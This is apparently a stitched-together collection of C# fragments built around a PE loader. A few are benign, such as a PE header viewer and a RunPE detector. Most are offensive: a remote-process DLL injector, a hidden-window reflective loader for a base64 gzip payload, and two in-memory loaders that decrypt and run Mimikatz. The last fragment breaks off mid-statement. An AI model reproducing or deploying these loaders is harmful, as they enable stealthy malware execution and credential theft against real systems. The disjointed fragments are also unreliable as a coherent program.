public static void LoadDll(int pID, byte[] dllBytes) { PEInfomation dllPE = PELoader.Load(dllBytes, string.Empty); IntPtr pHandle = PELoader.OpenProcessHandle(pID); if (pHandle == IntPtr.Zero) { throw new Exception("Invalid PID"); } IntPtr vAlloc = NativeMethods.VirtualAllocEx(pHandle, 0, dllPE.Overview.SizeOfImage, 0x1000, 0x40); if (vAlloc == IntPtr.Zero) { throw new Exception("Alloc failed"); } NativeMethods.WriteProcessMemory(pHandle, vAlloc, dllBytes, dllPE.Overview.SizeOfHeaders, 0); foreach (var section in dllPE.Sections) { byte[] sData = new byte[section.VirtualSize]; Buffer.BlockCopy(dllBytes, (int)section.PointerToRawData, sData, 0, sData.Length); NativeMethods.WriteProcessMemory(pHandle, new IntPtr(vAlloc.ToInt32() + section.VirtualAddress), sData, (uint)sData.Length, 0); } }
/// <summary> /// /// </summary> /// <param name="module">Main module of process being analyzed</param> /// <param name="processPID">Process id of process being analyzed</param> /// <returns></returns> private bool HasRunPE(ProcessModule module, int processPID) { //Catch if process has been killed already //try //{ // Process.GetProcessById(processPID); //} //catch //{ // return false; //} string modulePath = module.FileName; PEInfomation procPE = PELoader.Load(processPID, module); PEInfomation filePE = PELoader.Load(modulePath); int unmachedValues = 0; unmachedValues += ScanType(procPE.FileHeader, filePE.FileHeader); // File Header unmachedValues += ScanType(procPE.OptionalHeader32, filePE.OptionalHeader32); // Optional Header int sectionAmmount = Math.Min(Convert.ToInt32(procPE.Overview.NumberOfSections), Convert.ToInt32(filePE.Overview.NumberOfSections)); for (int i = 0; i < sectionAmmount; i++) { unmachedValues += ScanType(procPE.Sections[i], filePE.Sections[i]); } return(unmachedValues >= 8); }
public bool Load(string path) { if (path.StartsWith("./") || path.StartsWith(".\\")) { path = path.Substring(2); } if (!loaded.Contains(path)) { try { PELoader pe = new PELoader(path); long time = Debug.Clock; metaData.Add(MetaData.loadMetaData(path, pe, false, false)); // Debug.Report("inhaling " + path, Debug.Clock - time); loaded.Add(path); } catch { return(false); } } // Add top-level namespaces to global namespace foreach (MetaData m in metaData) { foreach (MetaDataTypeDefinition d in m.TypeDefs) { if (d.Namespace != "") { GetNameSpace(d.Namespace); } } } return(true); }
private void unloadSelectedModulesToolStripMenuItem_Click(object sender, EventArgs e) { foreach (ListViewItem i in lvModules.SelectedItems) { ModuleListViewItem item = (ModuleListViewItem)i; IntPtr pHandle = PELoader.OpenProcessHandle(ProcessID); DllInjector.UnloadDll(pHandle, item.ModuleInfomation.ModuleBaseAddress); PELoader.CloseProcessHandle(pHandle); PopulateList(); } }
private void processToolStripMenuItem1_Click(object sender, EventArgs e) { using (formLoadProcess procLoadForm = new formLoadProcess()) { if (procLoadForm.ShowDialog() == DialogResult.OK) { LoadedPE = PELoader.Load(procLoadForm.SelectedProcessID, procLoadForm.SelectedModule); LoadedPE.PESource = string.Format("Process: {0}", procLoadForm.ProcessName); lbCurrentSection.Text = "Overview"; PopulateInfo(LoadedPE.Overview, false); } } }
private void button1_Click(object sender, EventArgs e) { lbProcessList.Items.Clear(); lvFileList.Items.Clear(); ProcessModule moduleToScan = null; int pid = 0; using (formLoadProcess procLoadForm = new formLoadProcess()) { if (procLoadForm.ShowDialog() != DialogResult.OK) { return; } this.Text = string.Format("{0} ({1})", WindowText, procLoadForm.ProcessName); moduleToScan = procLoadForm.SelectedModule; pid = procLoadForm.SelectedProcessID; } string modulePath = moduleToScan.FileName; PEInfomation procPE = PELoader.Load(pid, moduleToScan); PEInfomation filePE = PELoader.Load(modulePath); int unmachedValues = 0; unmachedValues += ScanType <IMAGE_FILE_HEADER>(procPE.FileHeader, filePE.FileHeader, "File Header"); unmachedValues += ScanType <IMAGE_OPTIONAL_HEADER32>(procPE.OptionalHeader32, filePE.OptionalHeader32, "Optional Header", "ImageBase"); int sectionAmmount = Math.Min(Convert.ToInt32(procPE.Overview.NumberOfSections), Convert.ToInt32(filePE.Overview.NumberOfSections)); for (int i = 0; i < sectionAmmount; i++) { unmachedValues += ScanType <IMAGE_SECTION_HEADER>(procPE.Sections[i], filePE.Sections[i], string.Format("Section {0}", i + 1)); } Color tColor = Color.Green; string warningText = "No RunPE Found (0 Unmached values)"; if (unmachedValues >= 1) { tColor = Color.DarkTurquoise; warningText = string.Format("Possable RunPe ({0} Unmaching values)", unmachedValues); } if (unmachedValues > 4) { tColor = Color.Red; warningText = string.Format("RunPe Found ({0} Unmaching values)", unmachedValues); } lbRunpeStatus.Text = warningText; lbRunpeStatus.ForeColor = tColor; }
private void fileToolStripMenuItem1_Click(object sender, EventArgs e) { using (OpenFileDialog ofd = new OpenFileDialog()) { ofd.Filter = "Executable|*.exe|Library|*.dll"; if (ofd.ShowDialog() == DialogResult.OK) { LoadedPE = PELoader.Load(ofd.FileName); LoadedPE.PESource = ofd.FileName; lbCurrentSection.Text = "Overview"; PopulateInfo(LoadedPE.Overview, false); } } }
private static unsafe IntPtr GetFuncExport(PELoader pe, string funcName) { IntPtr ExportTablePtr = IntPtr.Zero; PELoader.IMAGE_EXPORT_DIRECTORY expDir; if (pe.Is32BitHeader && pe.OptionalHeader32.ExportTable.Size == 0) { return(IntPtr.Zero); } else if (!pe.Is32BitHeader && pe.OptionalHeader64.ExportTable.Size == 0) { return(IntPtr.Zero); } if (pe.Is32BitHeader) { ExportTablePtr = (IntPtr)((ulong)codebase + (ulong)pe.OptionalHeader32.ExportTable.VirtualAddress); } else { ExportTablePtr = (IntPtr)((ulong)codebase + (ulong)pe.OptionalHeader64.ExportTable.VirtualAddress); } expDir = (PELoader.IMAGE_EXPORT_DIRECTORY)Marshal.PtrToStructure(ExportTablePtr, typeof(PELoader.IMAGE_EXPORT_DIRECTORY)); for (int i = 0; i < expDir.NumberOfNames; i++) { IntPtr NameOffsetPtr = (IntPtr)((ulong)codebase + (ulong)expDir.AddressOfNames); NameOffsetPtr = (IntPtr)((ulong)NameOffsetPtr + (ulong)(i * Marshal.SizeOf(typeof(uint)))); IntPtr NamePtr = (IntPtr)((ulong)codebase + (uint)Marshal.PtrToStructure(NameOffsetPtr, typeof(uint))); string Name = Marshal.PtrToStringAnsi(NamePtr); if (Name.Contains(funcName)) { IntPtr AddressOfFunctions = (IntPtr)((ulong)codebase + (ulong)expDir.AddressOfFunctions); IntPtr OrdinalRvaPtr = (IntPtr)((ulong)codebase + (ulong)(expDir.AddressOfOrdinals + (i * Marshal.SizeOf(typeof(UInt16))))); UInt16 FuncIndex = (UInt16)Marshal.PtrToStructure(OrdinalRvaPtr, typeof(UInt16)); IntPtr FuncOffsetLocation = (IntPtr)((ulong)AddressOfFunctions + (ulong)(FuncIndex * Marshal.SizeOf(typeof(UInt32)))); IntPtr FuncLocationInMemory = (IntPtr)((ulong)codebase + (uint)Marshal.PtrToStructure(FuncOffsetLocation, typeof(UInt32))); return(FuncLocationInMemory); } } return(IntPtr.Zero); }
private void findUnlistedImageSectorsToolStripMenuItem_Click(object sender, EventArgs e) { MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION(); int mem_size = Marshal.SizeOf(memInfo); uint currentAddress = 0; IntPtr hProc = PELoader.OpenProcessHandle(ProcessID); while (NativeMethods.VirtualQueryEx(hProc, currentAddress, out memInfo, mem_size) != 0) { if (FoundModules.Contains(memInfo.AllocationBase)) { currentAddress += memInfo.RegionSize; continue; } if (memInfo.Protect == 0x1)//memInfo.Type != 0x1000000 { currentAddress += memInfo.RegionSize; continue; } IMAGE_DOS_HEADER header = PELoader.StructFromMemory <IMAGE_DOS_HEADER>(hProc, memInfo.AllocationBase); if (!FoundModules.Contains(memInfo.BaseAddress)) { byte[] buffer = new byte[memInfo.RegionSize]; NativeMethods.ReadProcessMemory(hProc, memInfo.BaseAddress, buffer, buffer.Length, 0); for (int i = 0; i < buffer.Length - 1; i++) { if (buffer[i] == 'M' && buffer[i + 1] == 'Z') { lvModules.Items.Add(new ModuleListViewItem(ProcessID, memInfo.BaseAddress + i)); } } FoundModules.Add(memInfo.BaseAddress); } /* * if(header.e_magic[0] == 'M' && header.e_magic[1] == 'Z') * lvModules.Items.Add(new ModuleListViewItem(ProcessID, memInfo.AllocationBase)); * FoundModules.Add(memInfo.AllocationBase); */ currentAddress += memInfo.RegionSize;//0x1000000 } PELoader.CloseProcessHandle(hProc); }
void PopulateList() { IntPtr pHandle = PELoader.OpenProcessHandle(ProcessID); if (pHandle == IntPtr.Zero) { MessageBox.Show("Failed to load process"); this.DialogResult = DialogResult.OK; return; } int size = 0; if (!NativeMethods.EnumProcessModulesEx(pHandle, null, 0, out size, 0x01)) { MessageBox.Show("Failed to get module count"); this.DialogResult = DialogResult.OK; return; } lvModules.Items.Clear(); FoundModules.Clear(); int ModuleCount = size / Marshal.SizeOf(typeof(IntPtr)); IntPtr[] modules = new IntPtr[ModuleCount]; if (!NativeMethods.EnumProcessModulesEx(pHandle, modules, size, out size, 0x01)) { MessageBox.Show("Failed to get modules"); this.DialogResult = DialogResult.OK; return; } FoundModules.AddRange(modules); foreach (IntPtr m in modules) { lvModules.Items.Add(new ModuleListViewItem(ProcessID, m)); } PELoader.CloseProcessHandle(pHandle); }
public ModuleListViewItem(int procID, IntPtr _handle) { ModuleInfomation = PELoader.Load(procID, _handle); Handle = _handle; ProcessHandle = ModuleInfomation.GetProcessHandle(); StringBuilder sb = new StringBuilder(255); NativeMethods.GetModuleFileNameEx(ProcessHandle, Handle, sb, 255); ModulePath = sb.ToString(); Text = Path.GetFileName(ModulePath); SubItems.Add(string.Format("0x{0:x2}", IntPtr.Size == 4 ? _handle.ToInt32() : _handle.ToInt64())); SubItems.Add(ModuleInfomation.Overview.SizeOfImage.ToString()); if (!string.IsNullOrEmpty(Text)) { SubItems.Add(ModulePath); } else { SubItems.Add("Byte loaded"); } }
private bool ExtractCurrentData(string il2cppPath, string metadataPath, out Il2Cpp il2Cpp, out Il2CppExecutor executor, out Metadata metadata) { il2Cpp = null; executor = null; metadata = null; var metadataBytes = File.ReadAllBytes(metadataPath); metadata = new Metadata(new MemoryStream(metadataBytes)); var il2cppBytes = File.ReadAllBytes(il2cppPath); var il2cppMagic = BitConverter.ToUInt32(il2cppBytes, 0); var il2CppMemory = new MemoryStream(il2cppBytes); if (il2cppMagic != IL2CPPMAGIC_PE) { throw new Exception("Unexpected il2cpp magic number."); } il2Cpp = new PE(il2CppMemory); il2Cpp.SetProperties(metadata.Version, metadata.maxMetadataUsages); if (il2Cpp.Version >= 27 && il2Cpp is ElfBase elf && elf.IsDumped) { metadata.Address = Convert.ToUInt64(Console.ReadLine(), 16); } try { var flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length); if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows)) { if (!flag && il2Cpp is PE) { il2Cpp = PELoader.Load(il2cppPath); il2Cpp.SetProperties(metadata.Version, metadata.maxMetadataUsages); flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length); } } if (!flag) { flag = il2Cpp.Search(); } if (!flag) { flag = il2Cpp.SymbolSearch(); } if (!flag) { var codeRegistration = Convert.ToUInt64(Console.ReadLine(), 16); var metadataRegistration = Convert.ToUInt64(Console.ReadLine(), 16); il2Cpp.Init(codeRegistration, metadataRegistration); } } catch { throw new Exception("ERROR: An error occurred while processing."); } executor = new Il2CppExecutor(metadata, il2Cpp); return(true); }
public static void Main() { // hide window var windowHandle = GetConsoleWindow(); ShowWindow(windowHandle, SW_HIDE); // base64 encoded payload back to bytes byte[] bytes = System.Convert.FromBase64String(payloadBASE64); // decompress / unzip payload bytes using (var msi = new MemoryStream(bytes)) { using (var mso = new MemoryStream()) { using (var gs = new GZipStream(msi, CompressionMode.Decompress)) { int cnt; byte[] tmpBytes = new Byte[512]; while ((cnt = gs.Read(tmpBytes, 0, tmpBytes.Length)) != 0) { mso.Write(tmpBytes, 0, cnt); } } bytes = mso.ToArray(); } } // PE injection PELoader pe = new PELoader(bytes); //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4")); IntPtr codebase = IntPtr.Zero; codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4")); // Copy Sections for (int i = 0; i < pe.FileHeader.NumberOfSections; i++) { IntPtr y = NativeDeclarations.VirtualAlloc(IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData); //Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4")); } // Perform Base Relocation // Calculate Delta long currentbase = (long)codebase.ToInt64(); long delta; delta = (long)(currentbase - (long)pe.OptionalHeader64.ImageBase); //Console.WriteLine("Delta = {0}", delta.ToString("X4")); //Console.WriteLine(pe.OptionalHeader64.BaseRelocationTable.VirtualAddress.ToString("X4")); //Console.WriteLine(pe.OptionalHeader64.BaseRelocationTable.Size.ToString("X4")); // Modify Memory Based On Relocation Table IntPtr relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress)); //Console.WriteLine(relocationTable.ToString("X4")); NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); //Console.WriteLine(relocationEntry.VirtualAdress.ToString("X4")); //Console.WriteLine(relocationEntry.SizeOfBlock.ToString("X4")); int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr nextEntry = relocationTable; int sizeofNextBlock = (int)relocationEntry.SizeOfBlock; IntPtr offset = relocationTable; while (true) { NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); IntPtr x = IntPtr.Add(relocationTable, sizeofNextBlock); relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr dest = IntPtr.Add(codebase, (int)relocationEntry.VirtualAdress); //Console.WriteLine("Section Has {0} Entires",(int)(relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) /2); //Console.WriteLine("Next Section Has {0} Entires", (int)(relocationNextEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++) { IntPtr patchAddr; UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i)); UInt16 type = (UInt16)(value >> 12); UInt16 fixup = (UInt16)(value & 0xfff); //Console.WriteLine("{0}, {1}, {2}", value.ToString("X4"), type.ToString("X4"), fixup.ToString("X4")); switch (type) { case 0x0: break; case 0xA: patchAddr = IntPtr.Add(dest, fixup); //Add Delta To Location. long originalAddr = Marshal.ReadInt64(patchAddr); Marshal.WriteInt64(patchAddr, originalAddr + delta); break; } } offset = IntPtr.Add(relocationTable, sizeofNextBlock); sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock; relocationEntry = relocationNextEntry; nextEntry = IntPtr.Add(nextEntry, sizeofNextBlock); if (relocationNextEntry.SizeOfBlock == 0) { break; } } // Resolve Imports IntPtr z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress); IntPtr oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress); int oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16)); // Get And Display Each DLL To Load for (int j = 0; j < 999; j++) // HardCoded Number of DLL's Do this Dynamically. { IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress); int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16)); IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part? IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, +Marshal.ReadInt32(IntPtr.Add(a1, 12)))); string DllName = Marshal.PtrToStringAnsi(dllNamePTR); if (DllName == "") { break; } IntPtr handle = NativeDeclarations.LoadLibrary(DllName); //Console.WriteLine("Loaded {0}", DllName); for (int k = 1; k < 9999; k++) { IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, +Marshal.ReadInt32(a2))); string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2)); //Console.WriteLine("Function {0}", DllFuncName); IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName); Marshal.WriteInt64(a2, (long)funcAddy); a2 = IntPtr.Add(a2, 8); if (DllFuncName == "") { break; } } } //Transfer Control To OEP //Console.WriteLine("Executing loaded PE"); IntPtr threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint); IntPtr hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero); NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF); //Console.WriteLine("Thread Complete"); //Console.ReadLine(); }
public override bool Execute() { byte[] unpacked = null; try { byte[] latestMimikatz = Misc.Decrypt(Convert.FromBase64String(this.MyProperty), "password"); //Yes, this is a bad idea. //Use Misc Class to encrypt your own files Stream data = new MemoryStream(latestMimikatz); //The original data Stream unzippedEntryStream; //Unzipped data from a file in the archive ZipArchive archive = new ZipArchive(data); foreach (ZipArchiveEntry entry in archive.Entries) { if (IntPtr.Size == 8 && entry.FullName == @"x64/mimikatz.exe") //x64 Unpack And Execute { //x64 Unpack And Execute Console.WriteLine(entry.FullName); unzippedEntryStream = entry.Open(); // .Open will return a stream unpacked = Misc.ReadFully(unzippedEntryStream); } else if (IntPtr.Size == 4 && entry.FullName == @"Win32/mimikatz.exe") { //x86 Unpack And Execute Console.WriteLine(entry.FullName); unzippedEntryStream = entry.Open(); // .Open will return a stream unpacked = Misc.ReadFully(unzippedEntryStream); } } } catch (Exception ex) { while (ex != null) { Console.WriteLine(ex.Message); ex = ex.InnerException; } } Console.WriteLine("Downloaded Latest"); PELoader pe = new PELoader(unpacked); IntPtr codebase = IntPtr.Zero; if (pe.Is32BitHeader) { Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4")); codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4")); } else { Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4")); codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4")); } //Copy Sections for (int i = 0; i < pe.FileHeader.NumberOfSections; i++) { IntPtr y = NativeDeclarations.VirtualAlloc(IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData); Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4")); } //Perform Base Relocation //Calculate Delta IntPtr currentbase = codebase; long delta; if (pe.Is32BitHeader) { delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase); } else { delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase); } Console.WriteLine("Delta = {0}", delta.ToString("X4")); //Modify Memory Based On Relocation Table IntPtr relocationTable; if (pe.Is32BitHeader) { relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress)); } else { relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress)); } NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr nextEntry = relocationTable; int sizeofNextBlock = (int)relocationEntry.SizeOfBlock; IntPtr offset = relocationTable; while (true) { NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); IntPtr x = IntPtr.Add(relocationTable, sizeofNextBlock); relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr dest = IntPtr.Add(codebase, (int)relocationEntry.VirtualAdress); for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++) { IntPtr patchAddr; UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i)); UInt16 type = (UInt16)(value >> 12); UInt16 fixup = (UInt16)(value & 0xfff); switch (type) { case 0x0: break; case 0x3: patchAddr = IntPtr.Add(dest, fixup); //Add Delta To Location. int originalx86Addr = Marshal.ReadInt32(patchAddr); Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta); break; case 0xA: patchAddr = IntPtr.Add(dest, fixup); //Add Delta To Location. long originalAddr = Marshal.ReadInt64(patchAddr); Marshal.WriteInt64(patchAddr, originalAddr + delta); break; } } offset = IntPtr.Add(relocationTable, sizeofNextBlock); sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock; relocationEntry = relocationNextEntry; nextEntry = IntPtr.Add(nextEntry, sizeofNextBlock); if (relocationNextEntry.SizeOfBlock == 0) { break; } } //Resolve Imports IntPtr z; IntPtr oa1; int oa2; if (pe.Is32BitHeader) { z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress); oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress); oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16)); } else { z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress); oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress); oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16)); } //Get And Display Each DLL To Load IntPtr threadStart; IntPtr hThread; if (pe.Is32BitHeader) { int j = 0; while (true) //HardCoded Number of DLL's Do this Dynamically. { IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress); int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16)); IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, Marshal.ReadInt32(IntPtr.Add(a1, 12)))); string DllName = Marshal.PtrToStringAnsi(dllNamePTR); if (DllName == "") { break; } IntPtr handle = NativeDeclarations.LoadLibrary(DllName); Console.WriteLine("Loaded {0}", DllName); int k = 0; while (true) { IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, Marshal.ReadInt32(a2))); string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2)); IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName); Marshal.WriteInt32(a2, (int)funcAddy); a2 = IntPtr.Add(a2, 4); if (DllFuncName == "") { break; } k++; } j++; } //Transfer Control To OEP Console.WriteLine("Executing Mimikatz"); threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint); hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero); NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF); Console.WriteLine("Thread Complete"); } else { int j = 0; while (true) { IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress); int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16)); IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part? IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, Marshal.ReadInt32(IntPtr.Add(a1, 12)))); string DllName = Marshal.PtrToStringAnsi(dllNamePTR); if (DllName == "") { break; } IntPtr handle = NativeDeclarations.LoadLibrary(DllName); Console.WriteLine("Loaded {0}", DllName); int k = 0; while (true) { IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, Marshal.ReadInt32(a2))); string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2)); //Console.WriteLine("Function {0}", DllFuncName); IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName); Marshal.WriteInt64(a2, (long)funcAddy); a2 = IntPtr.Add(a2, 8); if (DllFuncName == "") { break; } k++; } j++; } //Transfer Control To OEP Console.WriteLine("Executing Mimikatz"); threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint); hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero); NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF); Console.WriteLine("Thread Complete"); } //Transfer Control To OEP Console.WriteLine("Thread Complete"); //Console.ReadLine(); return(true); } //End Main
public static IntPtr LoadPE(byte[] latestMimikatz) { #if DEBUG Console.WriteLine("Loading PE (Mimikatz)"); #endif PELoader pe = new PELoader(latestMimikatz); if (pe.Is32BitHeader) { #if DEBUG Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4")); #endif codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); #if DEBUG Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4")); #endif } else { #if DEBUG Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4")); #endif codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); #if DEBUG Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4")); #endif } //Copy Sections for (int i = 0; i < pe.FileHeader.NumberOfSections; i++) { IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData); #if DEBUG Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4")); #endif } //Perform Base Relocation //Calculate Delta IntPtr currentbase = codebase; long delta; if (pe.Is32BitHeader) { delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase); } else { delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase); } #if DEBUG Console.WriteLine("Delta = {0}", delta.ToString("X4")); #endif //Modify Memory Based On Relocation Table IntPtr relocationTable; if (pe.Is32BitHeader) { relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress)); } else { relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress)); } NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr nextEntry = relocationTable; int sizeofNextBlock = (int)relocationEntry.SizeOfBlock; IntPtr offset = relocationTable; while (true) { NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock); relocationNextEntry = 